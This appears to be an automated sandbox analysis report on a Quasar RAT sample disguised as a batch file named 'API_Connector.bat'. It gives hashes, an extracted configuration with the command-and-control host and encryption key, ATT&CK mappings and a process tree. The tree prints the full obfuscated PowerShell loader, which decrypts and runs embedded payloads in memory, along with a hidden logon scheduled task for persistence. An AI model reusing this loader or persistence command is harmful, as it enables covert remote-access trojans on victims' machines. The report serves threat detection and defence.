quasar | fae3ed9b66f0e1fc27bdd6605dd3fd0600ff4291971d850f61cd0696c4ed9926

Analysis

max time kernel
147s
max time network
150s
platform
windows11-21h2_x64
resource
win11-20240508-en
resource tags

arch:x64arch:x86image:win11-20240508-enlocale:en-usos:windows11-21h2-x64system
submitted
10/06/2024, 14:58

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

API_Connector.bat
Size

586KB
MD5

54b83bd573c13cd414255d487f47b770
SHA1

f35b29215c9039af7294b1e9db7977447f380cbe
SHA256

fae3ed9b66f0e1fc27bdd6605dd3fd0600ff4291971d850f61cd0696c4ed9926
SHA512

8c607148b7e001d5ea9efb048cebf3fc78238f333cc09c368078f77b0d0fcf4ac22a5594bd7417515ee4ea73e7943fb1e47232e9caac6e3e74caa3313c89f6d9
SSDEEP

12288:LiR+aj62WqH39ttfD1KhLZ6azySThfOwppoCQ/gcOhKrYFuuZUDGO0:mQt2WwxGJtvpOt/owriUDt0

Score

10^/10

quasar slave execution spyware trojan

Malware Config

Extracted

Family

quasar

Version

1.3.0.0

Botnet

Slave

runderscore00-61208.portmap.host:61208

Mutex

QSR_MUTEX_cq1PvE2FSZsrtLytho

Attributes

encryption_key
5vXgZSbIpHJzAn3ZrosQ
install_name
$phantom-powershell.exe
log_directory
$phantom-Logs
reconnect_delay
3000
startup_key
Powershell
subdirectory
$phantom-zero

Signatures

Quasar RAT
Quasar is an open source Remote Access Tool.
trojan spyware quasar

Quasar payload 1 IoCs

resource	yara_rule
behavioral1/memory/3348-144-0x0000027A6A0A0000-0x0000027A6A0FE000-memory.dmp	family_quasar

Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
3348	powershell.exe
4012	powershell.exe
880	powershell.exe

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
1	ip-api.com
6	api.ipify.org

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Modifies data under HKEY_USERS 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	svchost.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1672260578-815027929-964132517-1000_Classes\Local Settings	powershell.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4012	powershell.exe
4012	powershell.exe
880	powershell.exe
880	powershell.exe
3348	powershell.exe
3348	powershell.exe
3348	powershell.exe
3348	powershell.exe
3348	powershell.exe
3348	powershell.exe
3348	powershell.exe
3348	powershell.exe
3348	powershell.exe
3348	powershell.exe
3348	powershell.exe
3348	powershell.exe
3348	powershell.exe
3348	powershell.exe
3348	powershell.exe
3348	powershell.exe
3348	powershell.exe
3348	powershell.exe
3348	powershell.exe
3348	powershell.exe
3348	powershell.exe
3348	powershell.exe
3348	powershell.exe
3348	powershell.exe
3348	powershell.exe
3348	powershell.exe
3348	powershell.exe
3348	powershell.exe
3348	powershell.exe
3348	powershell.exe
3348	powershell.exe
3348	powershell.exe
3348	powershell.exe
3348	powershell.exe
3348	powershell.exe
3348	powershell.exe
3348	powershell.exe
3348	powershell.exe
3348	powershell.exe
3348	powershell.exe
3348	powershell.exe
3348	powershell.exe
3348	powershell.exe
3348	powershell.exe
3348	powershell.exe
3348	powershell.exe
3348	powershell.exe
3348	powershell.exe
3348	powershell.exe
3348	powershell.exe
3348	powershell.exe
3348	powershell.exe
3348	powershell.exe
3348	powershell.exe
3348	powershell.exe
3348	powershell.exe
3348	powershell.exe
3348	powershell.exe
3348	powershell.exe
3348	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	4012	powershell.exe
Token: SeDebugPrivilege	880	powershell.exe
Token: SeIncreaseQuotaPrivilege	880	powershell.exe
Token: SeSecurityPrivilege	880	powershell.exe
Token: SeTakeOwnershipPrivilege	880	powershell.exe
Token: SeLoadDriverPrivilege	880	powershell.exe
Token: SeSystemProfilePrivilege	880	powershell.exe
Token: SeSystemtimePrivilege	880	powershell.exe
Token: SeProfSingleProcessPrivilege	880	powershell.exe
Token: SeIncBasePriorityPrivilege	880	powershell.exe
Token: SeCreatePagefilePrivilege	880	powershell.exe
Token: SeBackupPrivilege	880	powershell.exe
Token: SeRestorePrivilege	880	powershell.exe
Token: SeShutdownPrivilege	880	powershell.exe
Token: SeDebugPrivilege	880	powershell.exe
Token: SeSystemEnvironmentPrivilege	880	powershell.exe
Token: SeRemoteShutdownPrivilege	880	powershell.exe
Token: SeUndockPrivilege	880	powershell.exe
Token: SeManageVolumePrivilege	880	powershell.exe
Token: 33	880	powershell.exe
Token: 34	880	powershell.exe
Token: 35	880	powershell.exe
Token: 36	880	powershell.exe
Token: SeIncreaseQuotaPrivilege	880	powershell.exe
Token: SeSecurityPrivilege	880	powershell.exe
Token: SeTakeOwnershipPrivilege	880	powershell.exe
Token: SeLoadDriverPrivilege	880	powershell.exe
Token: SeSystemProfilePrivilege	880	powershell.exe
Token: SeSystemtimePrivilege	880	powershell.exe
Token: SeProfSingleProcessPrivilege	880	powershell.exe
Token: SeIncBasePriorityPrivilege	880	powershell.exe
Token: SeCreatePagefilePrivilege	880	powershell.exe
Token: SeBackupPrivilege	880	powershell.exe
Token: SeRestorePrivilege	880	powershell.exe
Token: SeShutdownPrivilege	880	powershell.exe
Token: SeDebugPrivilege	880	powershell.exe
Token: SeSystemEnvironmentPrivilege	880	powershell.exe
Token: SeRemoteShutdownPrivilege	880	powershell.exe
Token: SeUndockPrivilege	880	powershell.exe
Token: SeManageVolumePrivilege	880	powershell.exe
Token: 33	880	powershell.exe
Token: 34	880	powershell.exe
Token: 35	880	powershell.exe
Token: 36	880	powershell.exe
Token: SeIncreaseQuotaPrivilege	880	powershell.exe
Token: SeSecurityPrivilege	880	powershell.exe
Token: SeTakeOwnershipPrivilege	880	powershell.exe
Token: SeLoadDriverPrivilege	880	powershell.exe
Token: SeSystemProfilePrivilege	880	powershell.exe
Token: SeSystemtimePrivilege	880	powershell.exe
Token: SeProfSingleProcessPrivilege	880	powershell.exe
Token: SeIncBasePriorityPrivilege	880	powershell.exe
Token: SeCreatePagefilePrivilege	880	powershell.exe
Token: SeBackupPrivilege	880	powershell.exe
Token: SeRestorePrivilege	880	powershell.exe
Token: SeShutdownPrivilege	880	powershell.exe
Token: SeDebugPrivilege	880	powershell.exe
Token: SeSystemEnvironmentPrivilege	880	powershell.exe
Token: SeRemoteShutdownPrivilege	880	powershell.exe
Token: SeUndockPrivilege	880	powershell.exe
Token: SeManageVolumePrivilege	880	powershell.exe
Token: 33	880	powershell.exe
Token: 34	880	powershell.exe
Token: 35	880	powershell.exe

Suspicious use of FindShellTrayWindow 3 IoCs

pid	Process
3200	Explorer.EXE
3200	Explorer.EXE
3200	Explorer.EXE

Suspicious use of SendNotifyMessage 3 IoCs

pid	Process
3200	Explorer.EXE
3200	Explorer.EXE
3200	Explorer.EXE

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
3348	powershell.exe

Suspicious use of WriteProcessMemory 62 IoCs

description	pid	Process	procid_target
PID 4720 wrote to memory of 4168	4720	cmd.exe	78
PID 4720 wrote to memory of 4168	4720	cmd.exe	78
PID 4720 wrote to memory of 4012	4720	cmd.exe	79
PID 4720 wrote to memory of 4012	4720	cmd.exe	79
PID 4012 wrote to memory of 880	4012	powershell.exe	80
PID 4012 wrote to memory of 880	4012	powershell.exe	80
PID 4012 wrote to memory of 1160	4012	powershell.exe	83
PID 4012 wrote to memory of 1160	4012	powershell.exe	83
PID 1160 wrote to memory of 1988	1160	WScript.exe	84
PID 1160 wrote to memory of 1988	1160	WScript.exe	84
PID 1988 wrote to memory of 2460	1988	cmd.exe	86
PID 1988 wrote to memory of 2460	1988	cmd.exe	86
PID 1988 wrote to memory of 3348	1988	cmd.exe	87
PID 1988 wrote to memory of 3348	1988	cmd.exe	87
PID 3348 wrote to memory of 3200	3348	powershell.exe	52
PID 3348 wrote to memory of 2844	3348	powershell.exe	50
PID 3348 wrote to memory of 1560	3348	powershell.exe	25
PID 3348 wrote to memory of 1752	3348	powershell.exe	29
PID 3348 wrote to memory of 1948	3348	powershell.exe	32
PID 3348 wrote to memory of 3720	3348	powershell.exe	73
PID 3348 wrote to memory of 1352	3348	powershell.exe	23
PID 3348 wrote to memory of 1744	3348	powershell.exe	35
PID 3348 wrote to memory of 3376	3348	powershell.exe	53
PID 3348 wrote to memory of 2520	3348	powershell.exe	43
PID 3348 wrote to memory of 1132	3348	powershell.exe	19
PID 3348 wrote to memory of 932	3348	powershell.exe	11
PID 3348 wrote to memory of 1124	3348	powershell.exe	18
PID 3348 wrote to memory of 2692	3348	powershell.exe	48
PID 3348 wrote to memory of 3956	3348	powershell.exe	58
PID 3348 wrote to memory of 1108	3348	powershell.exe	17
PID 3348 wrote to memory of 1600	3348	powershell.exe	26
PID 3348 wrote to memory of 2484	3348	powershell.exe	42
PID 3348 wrote to memory of 2680	3348	powershell.exe	47
PID 3348 wrote to memory of 3404	3348	powershell.exe	54
PID 3348 wrote to memory of 2284	3348	powershell.exe	39
PID 3348 wrote to memory of 1296	3348	powershell.exe	22
PID 3348 wrote to memory of 2476	3348	powershell.exe	41
PID 3348 wrote to memory of 1288	3348	powershell.exe	69
PID 3348 wrote to memory of 2664	3348	powershell.exe	46
PID 3348 wrote to memory of 1084	3348	powershell.exe	16
PID 3348 wrote to memory of 2056	3348	powershell.exe	36
PID 3348 wrote to memory of 708	3348	powershell.exe	14
PID 3348 wrote to memory of 4612	3348	powershell.exe	64
PID 3348 wrote to memory of 1652	3348	powershell.exe	28
PID 3348 wrote to memory of 2532	3348	powershell.exe	72
PID 3348 wrote to memory of 1252	3348	powershell.exe	21
PID 3348 wrote to memory of 948	3348	powershell.exe	65
PID 3348 wrote to memory of 2032	3348	powershell.exe	34
PID 3348 wrote to memory of 1636	3348	powershell.exe	27
PID 3348 wrote to memory of 1436	3348	powershell.exe	24
PID 3348 wrote to memory of 1040	3348	powershell.exe	15
PID 3348 wrote to memory of 2024	3348	powershell.exe	33
PID 3348 wrote to memory of 1816	3348	powershell.exe	31
PID 3348 wrote to memory of 2364	3348	powershell.exe	40
PID 3348 wrote to memory of 1808	3348	powershell.exe	30
PID 3348 wrote to memory of 820	3348	powershell.exe	10
PID 3348 wrote to memory of 2196	3348	powershell.exe	38
PID 3348 wrote to memory of 2588	3348	powershell.exe	44
PID 3348 wrote to memory of 1208	3348	powershell.exe	67
PID 3348 wrote to memory of 1196	3348	powershell.exe	20
PID 3348 wrote to memory of 992	3348	powershell.exe	12
PID 3348 wrote to memory of 4416	3348	powershell.exe	62

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p
1⤵
PID:820

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k RPCSS -p
1⤵
PID:932

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
1⤵
PID:992

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
1⤵
PID:708

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
1⤵
PID:1040

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork -p
1⤵
PID:1084

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
1⤵
PID:1108

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
1⤵
PID:1124

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
1⤵
PID:1132

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
1⤵
PID:1196

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netprofm -p -s netprofm
1⤵
PID:1252

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
1⤵
PID:1296

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
1⤵
PID:1352

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
1⤵
PID:1436

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
1⤵
PID:1560

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p
1⤵
PID:1600

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
1⤵
PID:1636

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
1⤵
PID:1652

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
1⤵
PID:1752

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
1⤵
PID:1808

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
1⤵
PID:1816

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1948

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:2024

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:2032

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
1⤵
PID:1744

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
1⤵
PID:2056

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNoNetworkFirewall -p
1⤵
PID:2196

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
1⤵
PID:2284

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
1⤵
PID:2364

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
1⤵
PID:2476

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
1⤵
PID:2484

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p
1⤵
PID:2520

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
1⤵
PID:2588

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
1⤵
PID:2664

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
1⤵
PID:2680

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
1⤵
PID:2692

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
1⤵
PID:2844

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:3200
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\API_Connector.bat"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4720
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('lfqvBn8hofubXSZmsKmV83W9/qxpo9rugEdXZEomQLQ='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('bUSTj74gvGgYEhrqOpYzuQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $IoSqq=New-Object System.IO.MemoryStream(,$param_var); $WqTdq=New-Object System.IO.MemoryStream; $NwpAs=New-Object System.IO.Compression.GZipStream($IoSqq, [IO.Compression.CompressionMode]::Decompress); $NwpAs.CopyTo($WqTdq); $NwpAs.Dispose(); $IoSqq.Dispose(); $WqTdq.Dispose(); $WqTdq.ToArray();}function execute_function($param_var,$param2_var){ $nzMDD=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $RfEIj=$nzMDD.EntryPoint; $RfEIj.Invoke($null, $param2_var);}$LVpLY = 'C:\Users\Admin\AppData\Local\Temp\API_Connector.bat';$host.UI.RawUI.WindowTitle = $LVpLY;$UqrjN=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($LVpLY).Split([Environment]::NewLine);foreach ($uWetJ in $UqrjN) { if ($uWetJ.StartsWith('gXDGnOjJvtwCvUiJRmac')) { $KAIJT=$uWetJ.Substring(20); break; }}$payloads_var=[string[]]$KAIJT.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
    3⤵
    PID:4168
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Modifies registry class
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:4012
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName '$phantom-RuntimeBroker_startup_57_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\$phantom-startup_str_57.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:880
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\$phantom-startup_str_57.vbs"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1160
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\$phantom-startup_str_57.bat" "
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:1988
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('lfqvBn8hofubXSZmsKmV83W9/qxpo9rugEdXZEomQLQ='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('bUSTj74gvGgYEhrqOpYzuQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $IoSqq=New-Object System.IO.MemoryStream(,$param_var); $WqTdq=New-Object System.IO.MemoryStream; $NwpAs=New-Object System.IO.Compression.GZipStream($IoSqq, [IO.Compression.CompressionMode]::Decompress); $NwpAs.CopyTo($WqTdq); $NwpAs.Dispose(); $IoSqq.Dispose(); $WqTdq.Dispose(); $WqTdq.ToArray();}function execute_function($param_var,$param2_var){ $nzMDD=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $RfEIj=$nzMDD.EntryPoint; $RfEIj.Invoke($null, $param2_var);}$LVpLY = 'C:\Users\Admin\AppData\Roaming\$phantom-startup_str_57.bat';$host.UI.RawUI.WindowTitle = $LVpLY;$UqrjN=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($LVpLY).Split([Environment]::NewLine);foreach ($uWetJ in $UqrjN) { if ($uWetJ.StartsWith('gXDGnOjJvtwCvUiJRmac')) { $KAIJT=$uWetJ.Substring(20); break; }}$payloads_var=[string[]]$KAIJT.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
        6⤵
        
        PID:2460
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of SetWindowsHookEx
        Suspicious use of WriteProcessMemory
        
        PID:3348

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
1⤵
PID:3376

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
1⤵
PID:3404

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UdkSvcGroup -s UdkUserSvc
1⤵
PID:3956

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k osprivacy -p -s camsvc
1⤵
PID:4416

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
1⤵
PID:4612

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
1⤵
PID:948

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
1⤵
PID:1208

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
1⤵
- Modifies data under HKEY_USERS
PID:1288

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
1⤵
PID:2532

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
1⤵
PID:3720

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
df472dcddb36aa24247f8c8d8a517bd7

SHA1
6f54967355e507294cbc86662a6fbeedac9d7030

SHA256
e4e0fbc974e6946d20ddfaf22c543fccc4662d28e30530ec710fec149958f9b6

SHA512
06383259258a8c32f676ddaf7ea1fec3de7318ff1338f022e03c6b33458f2ce708e073ceb1aa26e3cf37f82dac37c8163b8ebd2de56b8530dffe177845c7adca

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

Filesize
1KB

MD5
3ec0d76d886b2f4b9f1e3da7ce9e2cd7

SHA1
68a6a2b7b0fa045cd9cf7d63d4e30600a7b25dea

SHA256
214be9e8293b00fc05089068033edb41da350e0f127dd782bf6cb748000a56a5

SHA512
a49d758d03e3a7bc38be29d577c3e0d0c69eb08d0496a81b9406b446c5808d7dfbab39c5be3b45cbb4aec511d87c6166453cbd12cebe5d8663a60b5d773206c6

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_hcsytksq.twb.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\$phantom-startup_str_57.bat

Filesize
586KB

MD5
54b83bd573c13cd414255d487f47b770

SHA1
f35b29215c9039af7294b1e9db7977447f380cbe

SHA256
fae3ed9b66f0e1fc27bdd6605dd3fd0600ff4291971d850f61cd0696c4ed9926

SHA512
8c607148b7e001d5ea9efb048cebf3fc78238f333cc09c368078f77b0d0fcf4ac22a5594bd7417515ee4ea73e7943fb1e47232e9caac6e3e74caa3313c89f6d9

Download Submit
C:\Users\Admin\AppData\Roaming\$phantom-startup_str_57.vbs

Filesize
123B

MD5
065cc72718daae804e5bea6753652a33

SHA1
3243bf10760303cc68da17673be2d2bc9565b464

SHA256
a49fed4eedf27903821b907776260c8567fd1de66c84689a53a4b55484c87cb7

SHA512
c237f5d45c75b687fd4dc737617f278639f88671893613e077778cc9210ee0521f17d61c12216c9bfc39de3510241ad33755ff64fa5b37813971225126086326

Download Submit
memory/880-27-0x00007FF991AE0000-0x00007FF9925A2000-memory.dmp

Filesize
10.8MB

Download
memory/880-30-0x00007FF991AE0000-0x00007FF9925A2000-memory.dmp

Filesize
10.8MB

Download
memory/880-17-0x00007FF991AE0000-0x00007FF9925A2000-memory.dmp

Filesize
10.8MB

Download
memory/880-18-0x00007FF991AE0000-0x00007FF9925A2000-memory.dmp

Filesize
10.8MB

Download
memory/932-110-0x00007FF972AD0000-0x00007FF972AE0000-memory.dmp

Filesize
64KB

Download
memory/1124-111-0x00007FF972AD0000-0x00007FF972AE0000-memory.dmp

Filesize
64KB

Download
memory/1196-108-0x00007FF972AD0000-0x00007FF972AE0000-memory.dmp

Filesize
64KB

Download
memory/1252-103-0x00007FF972AD0000-0x00007FF972AE0000-memory.dmp

Filesize
64KB

Download
memory/1296-100-0x00007FF972AD0000-0x00007FF972AE0000-memory.dmp

Filesize
64KB

Download
memory/1352-107-0x00007FF972AD0000-0x00007FF972AE0000-memory.dmp

Filesize
64KB

Download
memory/1560-105-0x00007FF972AD0000-0x00007FF972AE0000-memory.dmp

Filesize
64KB

Download
memory/1652-101-0x00007FF972AD0000-0x00007FF972AE0000-memory.dmp

Filesize
64KB

Download
memory/1948-104-0x00007FF972AD0000-0x00007FF972AE0000-memory.dmp

Filesize
64KB

Download
memory/2284-99-0x00007FF972AD0000-0x00007FF972AE0000-memory.dmp

Filesize
64KB

Download
memory/2532-102-0x00007FF972AD0000-0x00007FF972AE0000-memory.dmp

Filesize
64KB

Download
memory/2844-97-0x00007FF972AD0000-0x00007FF972AE0000-memory.dmp

Filesize
64KB

Download
memory/3200-96-0x00007FF972AD0000-0x00007FF972AE0000-memory.dmp

Filesize
64KB

Download
memory/3200-47-0x00000000063A0000-0x00000000063CA000-memory.dmp

Filesize
168KB

Download
memory/3348-145-0x0000027A6A130000-0x0000027A6A142000-memory.dmp

Filesize
72KB

Download
memory/3348-144-0x0000027A6A0A0000-0x0000027A6A0FE000-memory.dmp

Filesize
376KB

Download
memory/3376-109-0x00007FF972AD0000-0x00007FF972AE0000-memory.dmp

Filesize
64KB

Download
memory/3404-98-0x00007FF972AD0000-0x00007FF972AE0000-memory.dmp

Filesize
64KB

Download
memory/3720-106-0x00007FF972AD0000-0x00007FF972AE0000-memory.dmp

Filesize
64KB

Download
memory/4012-11-0x00007FF991AE0000-0x00007FF9925A2000-memory.dmp

Filesize
10.8MB

Download
memory/4012-9-0x0000023F97FF0000-0x0000023F98012000-memory.dmp

Filesize
136KB

Download
memory/4012-10-0x00007FF991AE0000-0x00007FF9925A2000-memory.dmp

Filesize
10.8MB

Download
memory/4012-0-0x00007FF991AE3000-0x00007FF991AE5000-memory.dmp

Filesize
8KB

Download
memory/4012-95-0x00007FF991AE0000-0x00007FF9925A2000-memory.dmp

Filesize
10.8MB

Download
memory/4012-12-0x00007FF991AE0000-0x00007FF9925A2000-memory.dmp

Filesize
10.8MB

Download
memory/4012-13-0x0000023FB05D0000-0x0000023FB0616000-memory.dmp

Filesize
280KB

Download
memory/4012-14-0x0000023FB0360000-0x0000023FB0368000-memory.dmp

Filesize
32KB

Download
memory/4012-15-0x0000023FB0620000-0x0000023FB0690000-memory.dmp

Filesize
448KB

Download